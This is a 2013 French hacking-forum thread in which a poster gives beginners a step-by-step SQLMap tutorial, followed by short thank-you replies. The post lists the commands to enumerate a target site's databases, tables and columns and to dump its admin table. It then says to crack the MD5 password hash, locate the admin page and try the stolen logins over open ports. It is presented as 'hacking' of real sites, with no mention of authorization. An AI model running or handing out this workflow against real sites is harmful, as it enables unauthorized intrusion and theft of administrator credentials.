FranceHack Index du Forum
S’enregistrerRechercherFAQMembresGroupesConnexion
Exploiter les bases de données SQL avec SQLMap

 
Répondre au sujet    FranceHack Index du Forum » Débutant » Kali / Backtrack Sujet précédent
Sujet suivant
Exploiter les bases de données SQL avec SQLMap
Auteur Message
Groscalin
Invité

Hors ligne




Message Exploiter les bases de données SQL avec SQLMap Répondre en citant
Je voudrais ici compléter le tuto de Yohan666 qui est assez bien d'ailleurs.
Le problème est qu'il passe par la barre d'adresse du navigateur et que la technique utilisée peu s'avérer longue et laborieuse...
Voici donc SQLMap, programmé en Python et téléchargeable gratuitement . 


Vous avez le fichier ? Bien ! Sachez que vous allez avoir besoin du CMD.exe sous Windows, Terminal.app sous Mac, et de la console sous Linux.
Vous démarrez votre programme en vous rendant dans le dossier que vous avez téléchargé en utilisant la commande cd.
Ensuite, vous trouvez votre fichier SQLMap.py en tapant la commande ls.


Le fichier s'ouvre avec la commande "python sqlmap.py" ou "./sqlmap.py" sans les guillemets.
Vous obtenez une erreur ? C'est normal ! Il faut entrer le site web sous forme de paramètre, mais si vous obtenez l'erreur, ça veut dire que le logiciel marche et qu'on passe au hacking !


Vous avez un site vulnérable http://www.sitevulnerable.com/xxx.php?id=xxx sous cette forme obligatoirement, et sans le ' à la fin de l'url.
Une base SQL se décompose en Base de Données, contenant des Tables, contenant des Colonnes, celle si contenant les infos que l'on cherche.


Nous allons lister les Bases de Données avec cette commande: "./sqlmap.py -u  http://www.sitevulnerable.com/xxx.php?id=xxx --dbs"
U pour url et dbs pour databases
Le programme se met en marche. Refusez tout les tests supplémentaires en répondant "N" aux demandes du programme, sauf si vous voulez un test complet.
Quand il vous dira que le paramètre "id" est vulnérable, répondez aussi "N" pour arrêter les recherches, car on a se que l'on voulait.


Les Bases de Données se listes.
D'habitude, il y en a 2, information_schema, qui ne nous intéresse pas, et une autre que j'appèlerai Sitevulnerable.


Exploitons les tables de Sitevulnerable comme ceci:
 "./sqlmap.py -u  http://www.sitevulnerable.com/xxx.php?id=xxx -D Sitevulnerable --tables"


Nous obtiendrons une liste comme ceci:


admin (avec un peu de chance)
contact
form
xxx
etc...


Donc, on va chercher les colonnes d'admin qui nous interresse.


"./sqlmap.py -u  http://www.sitevulnerable.com/xxx.php?id=xxx -D Sitevulnerable -T admin --columns"


Et nous obtiendrons un truc du genre : 


login varchar(50)
id varchar(25)
pass varchar(100)


Nous voulons récupérer les infos, donc nous éxécutons la commande :


"./sqlmap.py -u  http://www.sitevulnerable.com/xxx.php?id=xxx -D Sitevulnerable -T admin --dump"


Et nous obtiendrons quelque chose comme ça :


login admin
id 47309
pass ce55afa792c809e90ea1739a87196af9 


Le mot de passe ne marchera pas directement ! Et SQLMap vous en avertit ! C'est un hash MD5, donc, il reste à le cracker avec ce site, ou un logiciel externe:



Vous avez le mot de passe? Alors trouvez la page admin !
Si vous n'y arrivez pas, scannez les ports ouvert du site et essayez les logins sur ceux là, attention au type de connection ! (Http, Telnet, ...)


Toujours pas ?
Voici qui vous aidera peut-être, mais au-delà, les résultats ne sont pas garantis !
Vous pouvez toujours essayer les pour trouver votre page, en y ajoutant "inurl:http://www.sitevulnerable.com/"



Vidéo Tutoriel: 
 
 
 
Bon hack !


Jeu 16 Mai - 09:40 (2013)
Publicité






Message Publicité
PublicitéSupprimer les publicités ?

Jeu 16 Mai - 09:40 (2013)
Oryls
Invité

Hors ligne




Message Exploiter les bases de données SQL avec SQLMap Répondre en citant
Je te remercie. Super tuto tres éxplicatif


Mar 24 Sep - 08:49 (2013)
Groscalin
Invité

Hors ligne




Message Exploiter les bases de données SQL avec SQLMap Répondre en citant
Je te remercie. Super tuto tres éxplicatif




Tout le plaisir est pour moi ! ;)


Mer 25 Sep - 18:41 (2013)
Mugiwara
Invité

Hors ligne




Message Exploiter les bases de données SQL avec SQLMap Répondre en citant
Merci pour le tuto !


Mar 19 Nov - 08:52 (2013)
Contenu Sponsorisé






Message Exploiter les bases de données SQL avec SQLMap

Aujourd’hui à 01:16 (2016)
Montrer les messages depuis:    
Répondre au sujet    FranceHack Index du Forum » Débutant » Kali / Backtrack Toutes les heures sont au format GMT + 2 Heures
Page 1 sur 1

 

Portail | Index | créer un forum gratuit | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation
Powered by phpBB © 2001, 2005 phpBB Group
Design by Freestyle XL / Music Lyrics.Traduction par : phpBB-fr.com